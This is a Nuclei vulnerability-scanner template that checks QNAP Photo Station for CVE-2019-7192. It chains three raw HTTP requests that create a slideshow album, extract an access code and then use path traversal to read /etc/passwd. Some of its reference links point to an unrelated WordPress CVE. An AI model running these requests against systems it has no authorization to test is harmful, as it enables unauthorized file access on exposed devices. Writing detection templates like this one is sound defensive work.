nuclei-templates/http/cves/2019/CVE-2019-7192.yaml

id: CVE-2019-7192

info:
  name: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.    
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7192
    - https://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
    - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2546
    - https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-7192
    cwe-id: CWE-863
  metadata:
    max-request: 3
    verified: true
    shodan-query: 'Content-Length: 580 "http server 1.0"'
  tags: cve,cve2019,lfi,rce,kev,qnap,qts

http:
  - raw:
      - |
        POST /photo/p/api/album.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        a=setSlideshow&f=qsamplealbum

      - |
        GET /photo/slideshow.php?album={{album_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - |
        POST /photo/p/api/video.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - "admin:.*:0:0:"

      - type: word
        part: header_3
        words:
          - video/subtitle

      - type: status
        part: header_3
        status:
          - 200

    extractors:
      - type: regex
        name: album_id
        part: body_1
        group: 1
        regex:
          - '<output>([a-zA-Z]+)<\/output>'
        internal: true

      - type: regex
        name: access_code
        part: body_2
        group: 1
        regex:
          - encodeURIComponent\('([A-Za-z0-9]+)'\)
        internal: true